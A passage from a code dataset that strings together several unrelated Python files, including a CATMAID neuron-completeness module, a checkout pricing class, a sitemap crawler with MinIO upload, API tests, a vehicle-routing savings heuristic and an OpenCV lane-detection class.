completeness_report( CatmaidInterface=CatmaidInterface, annos=[anno] )\n meta_rep = meta_rep.append( rep.iloc[0] )\n return meta_rep[['Fraction Complete','Number Complete','Number Incomplete']]\n\ndef report_from_meta( meta, CatmaidInterface):\n \"\"\"\n Generate a completeness report based on a meta-annotation.\n\n Parameters\n ----------\n meta : string or id.\n Meta-annotation for which to generate the report.\n\n CatmaidInterface : CatmaidDataInterface\n Interaction object for a catmaid instance.\n\n Returns\n -------\n DataFrame\n Report for the annotations within the meta-annotation.\n \"\"\"\n anno_list = CatmaidInterface.get_annotations_from_meta_annotations(\n meta, flatten=True )\n anno_names = CatmaidInterface.parse_annotation_list(anno_list,\n output='names')\n return report_from_annotation_list( anno_names, CatmaidInterface )\n\ndef assert_pair( nrn_ids, pair_meta, CatmaidInterface ):\n \"\"\"\n Use a id-based annotation with a pair-specifying meta-annotation to\n establish hemilateral pairs in CATMAID.\n\n While nrn_ids will usually be a pair, we have to account for the\n cases where there are multiple indistinguishable neurons (e.g.\n broad LNs). Naming order will be numerical, since this approahc doesn't\n have a unique left/right ordering.\n \"\"\"\n\n # Check to see if neurons are already in a pair\n all_pair_annos = set(CatmaidInterface.get_annotations_from_meta_annotations(\n pair_meta, flatten=True ) )\n nrn_annos = set( CatmaidInterface.get_annotations_for_objects(\n nrn_ids ) )\n\n if len( all_pair_annos.intersection( nrn_annos ) ) > 0:\n for nrn_id in nrn_ids:\n specific_nrn_annos = set( CatmaidInterface.get_annotations_for_objects(\n [ nrn_id ] ) )\n if len( specific_nrn_annos.intersection( all_pair_annos ) ) > 0:\n print( \"Neuron with id {} is already paired!\".format(nrn_id) )\n else:\n if len(nrn_ids) < 4:\n pair_name = 'hemilateral_pair' + ''.join(\n ['_{}'.format(nid) for nid in sorted(nrn_ids)])\n else:\n pair_name = 'hemilateral_pair' + ''.join(\n ['_{}'.format(nid) for nid in sorted(nrn_ids[0:4])])+'_etc'\n\n d = CatmaidInterface.add_annotation(annotation_list=[pair_name],\n id_list=nrn_ids,\n meta_list=pair_meta)\n if len(d['new_annotations'])==0:\n print('Warning! No new annotations created!')\n print(d['message'])\n return\n\ndef is_matched( nrn_ids, pair_meta, CatmaidInterface ):\n \"\"\"\n is_matched( nrn_ids, pair_meta, CatmaidInterface)\n \"\"\"\n annos_with_meta = CatmaidInterface.get_annotations_from_meta_annotations( pair_meta, flatten=True )\n ids_matched = CatmaidInterface.get_ids_from_annotations(annos_with_meta, flatten=True)\n has_match = {}\n for skid in nrn_ids:\n if skid in ids_matched:\n has_match[skid] = True\n else:\n has_match[skid] = False\n return has_match\n\ndef matched_complete_report( anno_list, pair_meta, CatmaidInterface, max_open_ends=0.03, min_nodes = 500 ):\n \"\"\"\n\n \"\"\"\n anno_names = []\n left_incom = []\n left_com = []\n left_incom_match = []\n left_com_match = []\n left_total = []\n\n right_incom = []\n right_com = []\n right_incom_match = []\n right_com_match = []\n right_total = []\n\n for anno in anno_list:\n if len(anno_list[anno]) < 2:\n continue\n else:\n print(anno)\n anno_names.append(anno)\n \n nrns_left_ids = CatmaidInterface.get_ids_from_annotations(\n anno_list[anno]['l'],\n flatten=True )\n \n is_matched_left = is_matched( nrns_left_ids, pair_meta, CatmaidInterface )\n props_left = property_summary_estimated( nrns_left_ids, CatmaidInterface )\n props_left['is_matched'] = pd.Series(is_matched_left)\n lincom, lincom_match, lcom, lcom_match = _match_category_helper(\n props_left,\n max_open_ends=max_open_ends,\n min_nodes=min_nodes )\n\n left_incom.append( lincom )\n left_incom_match.append( lincom_match )\n left_com.append( lcom )\n left_com_match.append( lcom_match )\n left_total.append( lincom+lincom_match+lcom+lcom_match )\n \n nrns_right_ids = CatmaidInterface.get_ids_from_annotations(\n anno_list[anno]['r'],\n flatten=True )\n \n is_matched_right = is_matched( nrns_right_ids, pair_meta, CatmaidInterface )\n props_right = property_summary_estimated( nrns_right_ids, CatmaidInterface )\n props_right['is_matched'] = pd.Series(is_matched_right)\n rincom, rincom_match, rcom, rcom_match = _match_category_helper(\n props_right,\n max_open_ends=max_open_ends,\n min_nodes=min_nodes )\n\n right_incom.append( rincom )\n right_incom_match.append( rincom_match )\n right_com.append( rcom )\n right_com_match.append( rcom_match )\n right_total.append( rincom+rincom_match+rcom+rcom_match )\n\n out = pd.DataFrame( {'Annotation':anno_names,\n 'Left Total':left_total,\n 'Left Unmatched Incomplete': left_incom,\n 'Left Matched Incomplete' : left_incom_match,\n 'Left Unmatched Complete' : left_com,\n 'Left Matched Complete' : left_com_match,\n 'Right Total':right_total,\n 'Right Unmatched Incomplete': right_incom,\n 'Right Matched Incomplete' : right_incom_match,\n 'Right Unmatched Complete' : right_com,\n 'Right Matched Complete' : right_com_match,\n } )\n return out\n \n\ndef _match_category_helper( props, max_open_ends, min_nodes ):\n incom = sum(\n np.logical_and( np.logical_or( props['fraction_open_ends'] >= max_open_ends,\n props['node_count'] <= min_nodes ),\n props['is_matched'] == False )\n )\n\n incom_match = sum(\n np.logical_and( np.logical_or( props['fraction_open_ends'] >= max_open_ends,\n props['node_count'] <= min_nodes ),\n props['is_matched'] == True )\n )\n com = sum(\n np.logical_and( np.logical_and( props['fraction_open_ends'] < max_open_ends,\n props['node_count'] > min_nodes ),\n props['is_matched'] == False )\n )\n com_match = sum(\n np.logical_and( np.logical_and( props['fraction_open_ends'] < max_open_ends,\n props['node_count'] > min_nodes ),\n props['is_matched'] == True )\n )\n return incom, incom_match, com, com_match\n\ndef get_matched_id( skid, CatmaidInterface, pair_meta, include_self=False ):\n \"\"\"\n\n \"\"\"\n annos_with_meta = CatmaidInterface.get_annotations_from_meta_annotations( pair_meta, flatten=True )\n annos_for_skid = CatmaidInterface.get_annotations_for_objects( [skid] )\n pair_anno = list( set(annos_with_meta).intersection(annos_for_skid) )\n if len(pair_anno) > 0:\n ids_in_pair = CatmaidInterface.get_ids_from_annotations(pair_anno,flatten=True)\n if include_self:\n return list( set( ids_in_pair ) )\n else:\n return list( set( ids_in_pair ).difference(set([skid])) )\n else:\n print('No matched neuron!')\n return None\n\n\ndef filter_complete( id_list, CatmaidInterface, max_open_ends=0.03, min_node_count = 500, sensory_exception=False ):\n \"\"\"\n\n \"\"\"\n props = property_summary_estimated( id_list, CatmaidInterface )\n if sensory_exception:\n filt = (props['fraction_open_ends'] < max_open_ends) & (props['node_count'] > min_node_count)\n else:\n filt = (props['fraction_open_ends'] < max_open_ends) & (props['node_count'] > min_node_count) & ~(props['is_fragment'])\n\n return list( props[ filt ].index.values )\n\ndef _paired_ids_matched( CatmaidInterface,\n match_report_df,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for row in match_report_df.iterrows():\n if isinstance( row[1]['Group_1'], np.integer ):\n rel_ids_1 = [row[1]['Group_1']]\n else:\n rel_ids_1 = row[1]['Group_1']\n\n if isinstance( row[1]['Group_2'], np.integer ):\n rel_ids_2 = [row[1]['Group_2']]\n else:\n rel_ids_2 = row[1]['Group_2']\n\n for id1 in rel_ids_1:\n for id2 in rel_ids_2:\n pair_list.append( [id1, id2] )\n return pair_list\n\ndef _paired_ids_unmatched_ipsilateral( CatmaidInterface,\n id_list_1,\n id_list_2,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for ind, id1 in enumerate(id_list_1):\n for id2 in id_list_1[ind+1:]:\n pair_list.append([id1, id2])\n\n for ind, id1 in enumerate(id_list_2):\n for id2 in id_list_2[ind+1:]:\n pair_list.append([id1, id2])\n return pair_list\n\ndef _paired_ids_unmatched_contralateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n match_report_df,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for row in match_report_df.iterrows():\n if isinstance( row[1]['Group_1'], np.integer ):\n match_ids_1 = [row[1]['Group_1']]\n else:\n match_ids_1 = row[1]['Group_1']\n non_match_ids_1 = list( \n set(id_list_1_comp).difference(set(match_ids_1))\n )\n\n if isinstance( row[1]['Group_2'], np.integer ):\n match_ids_2 = [row[1]['Group_2']]\n else:\n match_ids_2 = row[1]['Group_2']\n non_match_ids_2 = list( \n set(id_list_2_comp).difference(set(match_ids_2))\n )\n\n for id1 in match_ids_1:\n for id2 in non_match_ids_2:\n pair_list.append([id1,id2])\n\n for id2 in match_ids_2:\n for id1 in non_match_ids_1:\n pair_list.append([id1,id2])\n return pair_list\n\ndef make_id_pairs( CatmaidInterface,\n id_list_1,\n id_list_2,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500,\n sensory_exception = False ):\n\n if type(id_list_1) is str:\n id_list_1 = CatmaidInterface.get_ids_from_annotations( id_list_1,\n flatten=True )\n if type(id_list_2) is str:\n id_list_2 = CatmaidInterface.get_ids_from_annotations( id_list_2,\n flatten=True )\n\n id_list_1_comp = filter_complete( id_list_1,\n CatmaidInterface,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count,\n sensory_exception=sensory_exception)\n id_list_2_comp = filter_complete( id_list_2,\n CatmaidInterface,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count,\n sensory_exception=sensory_exception)\n\n match_report_df = match_report( id_list_1_comp,\n id_list_2_comp,\n pair_meta,\n CatmaidInterface,\n name1='Group_1',\n name2='Group_2').drop('Unmatched')\n\n pairs_matched = _paired_ids_matched( CatmaidInterface,\n match_report_df,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count)\n\n pairs_ipsi = _paired_ids_unmatched_ipsilateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count )\n\n pairs_contra = _paired_ids_unmatched_contralateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n match_report_df,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count )\n\n return pairs_matched, pairs_ipsi, pairs_contra\n\n\ndef match_groups_arbitrary( list_of_id_lists,\n match_via,\n CatmaidInterface,\n nrns = None,\n anno_reference='names' ):\n \"\"\"\n Given N lists of neurons, create lists of groups based on a shared\n annotation (such as cell type) within a 'match_via' metaannotation.\n\n Parameters\n ----------\n id_list1 : list of list of ints\n List of skeleton ids in groups. Could be >2.\n\n match_via : string or int\n Annotation (as name or id) that annotates the annotations to match.\n\n CatmaidInterface : CatmaidDataInterface\n Interface for the Catmaid instance to query.\n\n nrns : NeuronListObject (default None)\n Optional NeuronListObject which already has neuron annotations\n listed. Must have all ids in list of id_lists to work.\n\n anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n Returns\n -------\n dict\n Match report, indexed by annotation name or id.\n \"\"\"\n annos_with_meta = set(CatmaidInterface.get_annotations_from_meta_annotations( match_via, flatten=True ) )\n annos_to_pair = []\n if nrns is None:\n for id_list in list_of_id_lists:\n annos_to_pair.append( { nid: set(CatmaidInterface.get_annotations_for_objects( [nid] )).intersection(annos_with_meta) for nid in id_list} )\n else:\n for id_list in list_of_id_lists:\n annos_to_pair.append( {nid: set( nrns[nid].annotations ).intersection(annos_with_meta) for nid in id_list} )\n\n matches = {}\n for group_ind, id_list in enumerate(list_of_id_lists):\n for nid in id_list:\n paired_annos = annos_to_pair[group_ind][nid]\n for anno in paired_annos:\n if anno not in matches:\n matches[anno] = [[] for l in list_of_id_lists]\n matches[anno][group_ind].append( nid )\n\n return matches\n\n","repo_name":"ceesem/catalysis","sub_path":"catalysis/completeness.py","file_name":"completeness.py","file_ext":"py","file_size_in_byte":43287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"5414896806","text":"from dataclasses import dataclass, field\nfrom collections import Counter\nfrom typing import Dict, List, Union, Any\n\nfrom moneyed import Money\n\n\n@dataclass\nclass Product:\n \"\"\"Class for keeping track of a Product\"\"\"\n code: str\n name: str\n unit_price: Dict[str, Dict]\n\n def get_unit_price(self) -> Money:\n return Money(self.unit_price[\"amount\"], self.unit_price[\"currency_code\"])\n\n\n@dataclass\nclass Checkout:\n products: Union[Dict[str, Product], List[Product]]\n product_discounts: Dict[str, Dict] = field(default_factory=dict)\n scanned_products: List = field(default_factory=list)\n default_currency: str = \"EUR\"\n\n def __post_init__(self):\n product_list = dict()\n for product in self.products:\n product_list[product.code] = product\n self.products = product_list\n\n def add_scanned_product(self, product_code: str) -> None:\n if product_code in self.products.keys():\n self.scanned_products.append(product_code)\n else:\n raise ValueError(\"Product code not found!\")\n\n def calculate_total(self) -> Money:\n sub_total = Money(\"0.00\", self.default_currency)\n if self.scanned_products:\n items_qty = Counter(self.scanned_products)\n\n for product_code, qty in items_qty.items():\n sub_total += self.calculate_item_subtotal(product_code, qty)\n self.products[product_code].get_unit_price()\n\n total = sub_total\n return total\n\n def calculate_item_subtotal(self, product_code: str, qty: int) -> Money:\n sub_total = Money(\"0.00\", self.default_currency)\n # One product can only have zero or one active discount at any moment.\n discount = self.get_active_product_discount(product_code)\n remaining_qty = qty\n\n if discount:\n if discount[\"type\"] == \"bulk\":\n if remaining_qty >= discount[\"min_qty\"]:\n unit_price = Money(\n discount[\"unit_price\"][\"amount\"],\n discount[\"unit_price\"][\"currency_code\"]\n )\n sub_total += unit_price * remaining_qty\n remaining_qty = 0\n\n elif discount[\"type\"] == \"package\":\n package_price = Money(\n discount[\"price\"][\"amount\"],\n discount[\"price\"][\"currency_code\"]\n )\n package_qty = remaining_qty // discount[\"qty\"]\n sub_total += package_price * package_qty\n remaining_qty = remaining_qty % discount[\"qty\"]\n\n if remaining_qty > 0:\n # Remaining subtotal without discounts\n unit_price = self.products[product_code].get_unit_price()\n sub_total += unit_price * remaining_qty\n\n return sub_total\n\n def get_active_product_discount(self, product_code: str) -> Union[Any, Dict]:\n discount = self.product_discounts.get(product_code, None)\n if discount:\n return discount[\"available_discounts\"].get(discount[\"active\"], None)\n return None\n","repo_name":"RmaxTwice/novicap-cc-checkout","sub_path":"src/entities/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34642443671","text":"import io\n\nimport requests\nfrom minio import S3Error\n\nfrom .response import (\n Response,\n SucessfulResponse,\n)\nfrom .gz import (\n is_gzipped,\n gunzip\n)\nfrom .sitemap import (\n Sitemap,\n SitemapIndex,\n SitemapUrlSet,\n iter_sitemap_entries\n)\n\nfrom .celery_logger import logger\nfrom .exceptions import *\n\nconnect_timeout, read_timeout = 10.0, 60.0\n\ndef fetch_url(url:str):\n try:\n r = requests.get(\n url=url,\n allow_redirects=False,\n timeout=(connect_timeout, read_timeout)\n )\n r.raise_for_status()\n logger.info('SuccessfulResponse')\n return SucessfulResponse(r.content)\n except requests.exceptions.RequestException:\n logger.info('SitemapRequestError')\n raise SitemapRequestError()\n\ndef xml_parser(response: Response):\n try:\n assert isinstance(response, SucessfulResponse)\n except AssertionError:\n raise SitemapRequestError()\n \n if is_gzipped(response.content):\n try:\n content = gunzip(response.content)\n except Exception as e:\n logger.info('SitemapGunzipError')\n raise SitemapGunzipError()\n else:\n content = response.content\n \n encoding = None\n for enc in ('utf-8', 'cp1252', 'utf-8-sig'):\n try:\n content.decode(enc)\n encoding = enc\n content = content.decode(enc)\n break\n except UnicodeError:\n logger.info('SitemapUnicodeError')\n raise SitemapUnicodeError()\n \n if not encoding:\n logger.info('SitemapUnicodeError')\n raise SitemapUnicodeError()\n\n try:\n s = Sitemap(content.encode('utf-8'))\n except Exception as e:\n logger.info('SitemapParsingError')\n raise SitemapParsingError() \n\n try:\n assert s.type in ['sitemapindex', 'urlset']\n except AssertionError:\n logger.info('SitemapTypeNotHandledError')\n raise SitemapTypeNotHandledError()\n\n try:\n urls = []\n for d in iter_sitemap_entries(s):\n if 'loc' in d.keys():\n urls.append(d['loc'])\n assert len(urls) > 0\n except AssertionError:\n logger.info('SitemapEmptyError')\n raise SitemapEmptyError()\n\n if s.type == 'sitemapindex':\n logger.info(f'SitemapIndex: {len(urls)} url')\n return SitemapIndex(urls)\n elif s.type == 'urlset':\n logger.info(f'SitemapUrlSet: {len(urls)} url')\n return SitemapUrlSet(urls)\n \n \ndef upload_data_to_minio_s3(client, data:list, file_name:str, bucket:str):\n try:\n found = client.bucket_exists(bucket)\n if not found:\n #Bucket not found, creating one\n client.make_bucket(bucket)\n data_len = len(data)\n data = '\\n'.join(data)\n result = client.put_object(\n bucket,\n file_name,\n io.BytesIO(data.encode()),\n len(data)\n )\n logger.info(f'UploadedSuccessfully: {data_len} url')\n return\n except S3Error as exc:\n logger.info('MinioS3Error')\n raise MinioS3Error()\n except UnicodeError:\n logger.info('MinioS3UnicodeError')\n raise MinioS3UnicodeError()\n\n","repo_name":"ossama131/machine-learning-methods-for-sitemap-analysis-compression-classification","sub_path":"distributed_crawler/proj/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38695243406","text":"#!/usr/bin/env python3\n\nfrom gxs700 import usbint\nfrom gxs700 import im_util\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Get default calibration file directory for attached sensor'\n )\n _args = parser.parse_args()\n\n gxs = usbint.GXS700(do_print=False)\n print(im_util.default_cal_dir(j=gxs.get_json()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JohnDMcMaster/gxs700","sub_path":"cal_dir.py","file_name":"cal_dir.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"83"} +{"seq_id":"30073462445","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom chalicelib.errors import APIError\nfrom chalicelib.native_land import native_land_from_point\n\n\n@pytest.fixture\ndef empty_result(FakeResp):\n return FakeResp(b\"[]\", 'OK', 200)\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_good_location(mock_get, good_native_land_result):\n '''It should return a list of dictionaries with the native lands Names'''\n mock_get.return_value = good_native_land_result\n result = native_land_from_point(42.553080, -86.473389)\n assert [r['Name'] for r in result] == [\"Peoria\", \"Bodwéwadmi (Potawatomi)\"]\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_404_location(mock_get, response_404):\n '''It should raise if we get a 404 from api'''\n mock_get.return_value = response_404\n with pytest.raises(APIError):\n native_land_from_point(42.553080, -86.473389)\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_empty(mock_get, empty_result):\n '''It should return an empty list from an emptry response'''\n mock_get.return_value = empty_result\n assert native_land_from_point(42.553080, -86.473389) == []\n","repo_name":"codeforanchorage/land_acknowledgement_lambda","sub_path":"tests/test_native_land.py","file_name":"test_native_land.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35129349655","text":"import os\nimport sys\nimport mangadex\nimport json\nimport pytest\n\ndef read_json_files(filename : str, mode :str = \"r\") -> dict:\n with open(filename, mode) as f:\n resp = json.load(f)\n return resp\n\nclass TestApi():\n api = mangadex.Api()\n timeout = 5\n def test_SearchManga(self):\n # we're going to search for the iris zero\n failed = False\n resp = self.api.get_manga_list(title = \"iris zero\", limit = 1)[0]\n\n try:\n saved_resp = read_json_files(\"test/saved_search_manga_response.json\")\n except FileNotFoundError:\n print (\"File not found\")\n failed = True\n saved_resp = mangadex.Manga._create_manga(saved_resp[\"results\"][0])\n\n if failed:\n return False\n\n assert resp == saved_resp, \"The Manga objects are not equal\"\n \n def test_GetMangaChapter(self):\n failed = False\n resp = self.api.get_chapter(id = \"015979c8-ffa4-4afa-b48e-3da6d10279b0\")\n try:\n saved_resp = read_json_files(\"test/saved_get_chapter_response.json\")\n except FileNotFoundError:\n saved_resp = read_json_files(\"saved_get_chapter_response.json\")\n finally:\n print(\"File not found, test failed\")\n failed = True\n \n saved_resp = mangadex.Chapter._create_chapter(saved_resp)\n\n if failed:\n return False\n\n assert resp == saved_resp, \"The Chapter Objects are not equal\"\n\n # def test_save_jsons(self):\n # url = f\"{self.api.URL}/author/df765fdc-ea9f-45d0-9191-d95615662d49\"\n # with open(\"test/saved_get_author_id_response.json\", \"w+\") as f:\n # json.dump(mangadex.URLRequest._request_url(url, \"GET\", timeout=self.timeout),f)\n \n def test_GetAuthor(self):\n failed = False\n resp = self.api.get_author_by_id(id = \"df765fdc-ea9f-45d0-9191-d95615662d49\")\n try:\n saved_resp = read_json_files(\"test/saved_get_author_id_response.json\")\n except:\n saved_resp = read_json_files(\"saved_get_author_id_response.json\")\n finally:\n print(\"File not found, test could not be completed\")\n failed = False\n \n saved_resp = mangadex.Author._create_author(saved_resp)\n\n if failed:\n return False\n \n assert resp == saved_resp, \"The Author Objects are not equal\"\n\n def test_GetScanlationGroup(self):\n raise NotImplementedError\n \n def test_GetTags(self):\n raise NotImplementedError\n \n def test_GetMangaChaptersAndVolumes(self):\n raise NotImplementedError\n\n","repo_name":"TLaks/mangadex","sub_path":"test/test_unittest.py","file_name":"test_unittest.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"18564001633","text":"a=[4,3,5,6,5,1,2] ## saraksts\na.append(8) ## добавление 8\na.append('ku') ## добавление ку\na.remove(5) ## удаление 5\nprint (a) ## вывод а\na[2]=10 ## вставляем 10 во второй элемент\ndel a[7] ##удаляет 7 элемент\nprint (a) ##\na.sort() ##\na.reverse() ## в порядке убывания\nprint (a) ##\n\nb='computer' ##\nprint(b)\n\n\nc=list(map(lambda x: x**2,a)) ##square kvadrat\nprint(c)\n\nd=[3,5,3,5,8,8,8,3,8,7,3,5,]\nprint (d.count(5)) ##выводит кол-во пятерок\n\nf=list(map(lambda x: x**0.5,c)) ##sqrt\nprint(f)\n\nc.extend(f)\nprint(c)\n\na.extend(c)\nprint(a)","repo_name":"berwy/saraksti-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74475308432","text":"from collections import deque\n\ndef calc_saving(unrouted, i, distMatrix):\n savings = [ (distMatrix[i,0] + distMatrix[0,j] - distMatrix[i,j], - distMatrix[i,j], i, j) for j in unrouted if i != j ]\n savings.sort()\n return savings\n\n\ndef sequential_savings_init(distMatrix, demandList, truckCapacity = 1.0):\n \n C_EPS = 1e-10\n \n N = len(distMatrix)\n\n # nodes not in a route \n # 0 = depot that will not be in a route\n unrouted = set(range(1, N))\n \n # generate a list of node's indices for route inititialization \n customerIndices = list(range(1, N))\n customerIndices.sort(reverse = True, key = lambda i: ( distMatrix[0][i],i) )\n \n solution = [0]\n savings = None\n emerging_route_nodes = None\n\n while unrouted:\n\n\n # Initialize a new route\n if not savings:\n \n while True:\n customer = customerIndices.pop()\n if customer in unrouted:\n break\n \n emerging_route_nodes = deque([customer])\n unrouted.remove(customer)\n \n route_demand = demandList[customer]\n \n savings = calc_saving(unrouted, customer, distMatrix)\n \n\n while len(savings) > 0:\n\n # i is the one to merge with\n # j is the candidate to be merged\n _, _, i, j = savings.pop()\n \n\n cw_saving = distMatrix[i,0] + distMatrix[0,j] - distMatrix[i,j]\n\n if cw_saving < 0.0:\n savings = []\n break\n \n\n if not j in unrouted:\n continue\n \n if truckCapacity and route_demand + demandList[j] - C_EPS > truckCapacity:\n continue # next savings\n \n # it is still a valid merge?\n do_left_merge = emerging_route_nodes[0] == i\n do_right_merge = emerging_route_nodes[-1] == i and\\\n len(emerging_route_nodes) > 1\n if not (do_left_merge or do_right_merge):\n continue # next savings\n \n \n # update the route demand\n route_demand += demandList[j]\n \n\n if do_left_merge:\n emerging_route_nodes.appendleft(j)\n if do_right_merge:\n emerging_route_nodes.append(j)\n\n unrouted.remove(j)\n \n # update the savings list\n savings += calc_saving(unrouted, j, distMatrix)\n savings.sort()\n \n \n emerging_route_nodes.append(0)\n solution += emerging_route_nodes\n emerging_route_nodes = None\n \n return solution","repo_name":"itsAlfantasy/FOR_Project","sub_path":"notebooks/cwSavings.py","file_name":"cwSavings.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"40897387529","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport grabber as grab\nimport time\nimport math\nimport joystick\n#\"C:/car vision proj/media/scr.jpg\"\n#path = \"C:/car vision proj/media/DR101423.AVI\"\n#path = \"D:/Denis/Downloads/2020-12-12 23-32-11.mp4\"\n#path = \"C:/car vision proj/media/withoutsound.mp4\"\n#path = \"D:/Denis/Downloads/withoutsound.mp4\"\npath = \"D:/video/2020-12-12 23-32-11.mp4\"\nclass visor():\n def __init__(self, colorimage):\n if type(colorimage) == type(\"sample\"):\n self.colorimage = cv2.imread(colorimage)\n \n else:\n self.colorimage = colorimage\n \n \n\n self.image = cv2.cvtColor(self.colorimage, cv2.COLOR_BGR2GRAY)\n #self.image = np.multiply(self.image, 10)\n\n\n self.lineColor = ((0,255,0),(0,0,255),(78,237,232)) # blue green red\n self.line_thickness = 2 \n self.canny_treshold = (50, 250)\n self.polygons = [[(80, 719), (1200,719),(727+40,320), (610-40,320)]] #MAUN ###############################\n #self.polygons = [[(0, 719), (1280,719),(640,360)]] #triangle\n #self.polygons = [[(0, 719), (1280,719),(640,360)]]\n #image parameters\n self.imageHeight = self.image.shape[0] #720 \n self.imageWidth = self.image.shape[1] #1280 \n\n self.lines = None\n self.leftLine = None\n self.rightLine = None\n self.averegedLines = None\n\n #images\n self.canny_image = None\n self.cropped_image = None\n self.line_image = None\n\n\n # Hough parameters\n self.RHO = 1 \n self.theta = np.pi/360\n self.houhgVoteTreshold = 50\n self.minLineLength = 20\n self.maxLineGap = 20\n\n\n self.slopeTreshold = 1 #0.5\n\n\n self.parCounter = 0\n\n self.foo = 0\n self.verticalLine = np.array([640, self.imageHeight, 640, 0])\n self.DoDisplayVerticalLine = True\n \n self.leftLineOLD = None\n self.rightLineOLD = None\n\n\n def canny(self):\n kernel = np.ones((7,7),np.float32)/40\n blur = cv2.filter2D(self.image,-1,kernel)\n #blur = cv2.GaussianBlur(self.image ,(7,7),0)\n self.canny_image = cv2.Canny(blur, self.canny_treshold[0], self.canny_treshold[1])\n\n\n def cropImage(self):\n polygon = np.array(self.polygons)\n mask = np.zeros_like(self.image)\n cv2.fillPoly(mask, polygon, 255)\n self.cropped_image = cv2.bitwise_and(self.canny_image, mask)\n\n\n def makeLines(self):\n self.lines = cv2.HoughLinesP(self.cropped_image,self.RHO,self.theta, self.houhgVoteTreshold, minLineLength = self.minLineLength, maxLineGap = self.maxLineGap)\n #@staticmethod\n def makeCoordinates(self, lineParameters):\n slope, intercept = lineParameters\n y1 = self.imageHeight\n y2 = int(y1*(3/5))\n x1 = int((y1 - intercept)/slope) \n x2 = int((y2 - intercept)/slope) \n return np.array([x1,y1, x2,y2, 0])\n\n\n def averageLines(self):\n leftFit = []\n rightFit = []\n if self.lines is not None:\n for line in self.lines:\n x1, y1, x2, y2 = line.reshape(4)\n slope, intercept = np.polyfit((x1,x2), (y1,y2), 1)\n if slope < -self.slopeTreshold: #исх <\n leftFit.append((slope, intercept))\n #leftSlope.append(slope)\n elif slope > self.slopeTreshold: #>\n rightFit.append((slope, intercept))\n #rightSlope.append(slope)\n self.leftFitAVG = np.average(leftFit, axis=0)\n self.rightFitAVG = np.average(rightFit, axis=0)\n\n try:\n self.leftLine = self.makeCoordinates(self.leftFitAVG) \n except Exception as e:\n # print(e, '\\n')\n # self.leftLine = np.array([0,0,0,0]) \n pass\n try:\n self.rightLine = self.makeCoordinates(self.rightFitAVG)\n except Exception as e:\n pass\n #print(e, '\\n')\n #self.rightLine = np.array([0,0,0,0])\n\n\n\n\n #debug\n if self.DoDisplayVerticalLine == True:\n self.averegedLines = np.array([self.leftLine,self.rightLine, self.verticalLine])\n else:\n self.averegedLines = np.array([self.leftLine,self.rightLine])#, self.verticalLine])\n\n\n def newDisplayer(self): #lines = self. ...\n self.line_image = np.copy(self.colorimage)\n if self.leftLine is not None:\n lx1, ly1, lx2, ly2, lcolor = self.leftLine.reshape(5)\n cv2.line(self.line_image, (lx1,ly1), (lx2,ly2), self.lineColor[lcolor], self.line_thickness)\n self.leftLine = np.array([lx1, ly1, lx2, ly2, 1])\n self.leftLineOLD = np.copy(self.leftLine)\n if self.rightLine is not None:\n rx1, ry1, rx2, ry2, rcolor = self.rightLine.reshape(5)\n cv2.line(self.line_image, (rx1,ry1), (rx2,ry2), self.lineColor[rcolor], self.line_thickness)\n self.rightLine = np.array([rx1, ry1, rx2, ry2, 1])\n self.rightLineOLD = np.copy(self.rightLine)\n\n\n \n\n def updateImage(self, colorimage):\n self.colorimage = colorimage\n self.image = cv2.cvtColor(self.colorimage, cv2.COLOR_BGR2GRAY)\n \n self.image = self.image + 45\n #self.image *= 2\n self.imageHeight = self.image.shape[0] #720 \n self.imageWidth = self.image.shape[1] #1280 \n\n def show(self):\n cv2.cv2.imshow(\"lines\", self.line_image) #self.line_image)\n cv2.imshow(\"cropImage\", self.cropped_image)\n #cv2.imshow(\"cropImage\", self.canny_image)\n\n\n\n def lineCorrection(self):\n if self.leftLine is not None or self.rightLine is not None:\n try:\n if (self.leftLine[4] == 0) and (self.rightLine[4] !=0):\n dx1, dy1, dx2, dy2 = 0,0,0,0\n dx1 = self.leftLine[0] - self.leftLineOLD[0]\n dy1 = self.leftLine[1] - self.leftLineOLD[1]\n dx2 = self.leftLine[2] - self.leftLineOLD[2] \n dy2 = self.leftLine[3] - self.leftLineOLD[3]\n a = [self.rightLine[0]+dx1, 